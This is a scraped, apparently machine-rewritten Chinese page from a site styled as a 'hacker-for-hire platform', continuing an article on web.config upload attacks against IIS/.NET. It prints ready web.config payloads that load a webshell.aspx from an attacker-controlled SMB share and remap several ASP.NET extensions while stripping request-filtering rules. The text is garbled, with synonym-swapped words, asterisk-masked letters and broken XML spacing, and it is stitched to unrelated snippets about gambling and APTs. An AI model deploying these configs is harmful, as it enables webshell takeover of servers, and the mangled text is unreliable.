深入分析web.config上传方面的安全问题(下)-黑客接单平台
(接上文)
2.2. 接收现有/上传的.NET文件
下面的web.config可用于接收现有的Web服务文件:
<?xmlversion="1.0"encoding="UTF-8"?>
<configuration>
<system.web>
<webServices>
<protocols>
<addname="Documentation"/>
</protocols>
<wsdlHelpGeneratorhref="KaliBoxIPPublicwebshell.aspx"/>
</webServices>
</system.web>
</configuration>
这将从 *** B同享加载webshell.aspx文件,并在翻开该文件夹中的任何现有A *** X文件时履行它。
此外,咱们也能够像A *** X文件那样,从头映射和运用具有.master和.ascx扩展名的文件。上传具有上面两种扩展名的文件的可能性要高于其他类型的ASP.NET扩展,例如.aspx、.a *** x、.ashx、.svc和.soap,不过,它们也能够运用相同的技能来接收.NET文件。
下面的web.config文件给出了一个能够接收具有各种扩展名的文件的比如:
<?xmlversion="1.0"encoding="UTF-8"?>
<configuration>
<system.web>
<webServices>
<protocols>
<addname="Documentation"/>
</protocols>
<wsdlHelpGeneratorhref="KaliBoxIPPublicwebshell.aspx"/>
</webServices>
</system.web>
<system.webServer>
<handlers>
<addname="remap_a *** x1"path="*.ascx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x2"path="*.master"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x3"path="*.aspx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x4"path="*.ashx"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x5"path="*.svc"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
<addname="remap_a *** x6"path="*.soap"verb="*"type="System.Web.Script.Services.ScriptHandlerFactory,System.Web.Extensions,Version=4.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35"resourceType="File"requireAccess="Script"/>
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<removefileExtension=".ascx"/>
<removefileExtension=".master"/>
</fileExtensions>
</requestFiltering>
</security>
</system.webServer>
</configuration>[1][2][3][4][5]黑客接单网
相关文章
.NET 性能优化的技巧-黑客接单平台
最大化内联 内联是将办法体(method body)复制到调用站点的技能,这样咱们就能够防止跳转、参数传递和寄存器保存/康复等繁琐进程。除了节约这些之外,内联仍是完结其他优化的必要条件。 不不过Ros...
winrar密码破解工具-中国安全网
其间,清晰的针对我国境内施行进犯活动的,而且仍旧活泼的揭露APT 安排,包含海莲花,摩诃草,蔓灵花,Darkhotel,Group 123,毒云藤和蓝宝菇,其间毒云藤和蓝宝菇是360在2018年下半年...
朋友借我的钱去赌博了这钱还能要回来吗我一哥们借了
安装配置Exchange Server,参考复现环境补丁下载链接朋友借我的钱去赌博了这钱还能要回来吗我一哥们借了, 研究人员在Comodo Antivirus / Comodo Antivirus A...
你好我老婆背着我,在网上赌钱输几十万有办法弄回
远程桌面服务但是在GCC会话初始化的过程中,客户端提供的信道名称并不在服务器端的白名单中,因此攻击者将能够设置另一个名为“MS_T120”的SVC信道(而不是之前编号为31的合法信道)来让目标系统发生...
老公是个赌博坐牢半年回来的人,他坐牢后我才知道
互联网公开渠道出现能导致蓝屏的PoC代码,斗象安全应急响应团队已经确认了PoC代码的可用性sleep 1 根据相关数据源统计,目前,全球公共网络中有近300多万计算机开启了3389端口,即未改变端口的...
找一部骗片子,一男一女去骗一个中国人赌橄榄球。
在曩昔的APT要挟或许网络进犯活动中,运用邮件投递歹意的文档类载荷对错常常见的一种进犯办法,一般投进的文档大多为Office文档类型,如doc、docx,xls,xlsx。 3. 装置 gcc-4.4...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!